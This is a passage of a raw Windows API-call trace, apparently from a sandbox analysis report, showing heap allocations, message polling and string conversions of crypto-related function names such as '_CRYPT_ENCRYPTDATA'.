RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0171.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0171.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0171.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0171.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0171.997] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0171.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0171.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0171.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0171.997] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0171.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0171.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0171.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0171.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54df8 [0171.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0171.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0171.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0171.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0171.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf0c00) returned 0x3eee020 [0172.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0172.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d38 [0172.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0172.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0172.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0172.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ec8 [0172.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0172.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0172.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0172.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e68 [0172.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0172.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0172.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0172.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0172.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0172.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0172.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0172.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0172.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0172.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf0c00) returned 0x3fe0020 [0172.133] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0172.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0172.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0172.134] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0172.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0172.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0172.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0172.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0172.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0172.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0172.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0172.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0172.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0172.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0172.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0172.134] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0172.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0172.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0172.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0172.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0172.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0172.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0172.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0172.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0172.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0172.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0172.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0172.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0172.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0172.135] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0172.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0172.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0172.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0172.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0172.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0172.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0172.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0172.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0172.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0172.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0172.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0172.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0172.135] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0172.135] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0172.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0172.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0172.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0172.135] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0172.136] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0172.136] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0172.136] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0172.136] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0172.136] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0172.136] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0172.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0172.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0172.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0172.136] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0172.136] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0172.136] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0172.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0172.136] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0172.136] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0172.136] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0172.136] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0172.136] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0172.136] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0172.136] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0172.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0172.136] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0172.136] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0172.136] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0172.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0172.136] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0172.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0172.137] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0172.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0172.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0172.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0172.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0172.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0172.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0172.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0172.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0172.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0172.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0172.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0172.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0172.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0172.137] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0172.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0172.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0172.137] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0172.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0172.137] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0172.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0172.137] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0172.138] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0172.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0172.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0172.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0172.138] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0172.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0172.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0172.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0172.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0172.138] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0172.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0172.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0172.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0172.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0172.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0172.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0172.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0172.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0172.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0172.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0172.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0172.138] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0172.138] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0172.138] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0172.138] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0172.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0172.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0172.139] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0172.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0172.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0172.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0172.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0172.139] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0172.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0172.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0172.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0172.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0172.139] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0172.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0172.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0172.139] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0172.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0172.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0172.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0172.139] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0172.139] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0172.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0172.139] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0172.139] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0172.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0172.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0172.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0172.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0172.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0172.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0172.140] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0172.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0172.140] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0172.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0172.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0172.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0172.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0172.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0172.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0172.140] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0172.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0172.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0172.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0172.140] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0172.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0172.140] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0172.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0172.140] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0172.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0172.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0172.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0172.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0172.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0172.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0172.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0172.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0172.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0172.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0172.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0172.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0172.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0172.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0172.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0172.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0172.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0172.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0172.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0172.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0172.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0172.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0172.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0172.141] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0172.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0172.141] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0172.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0172.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0172.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0172.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0172.142] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0172.142] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0172.142] HeapFree (in: 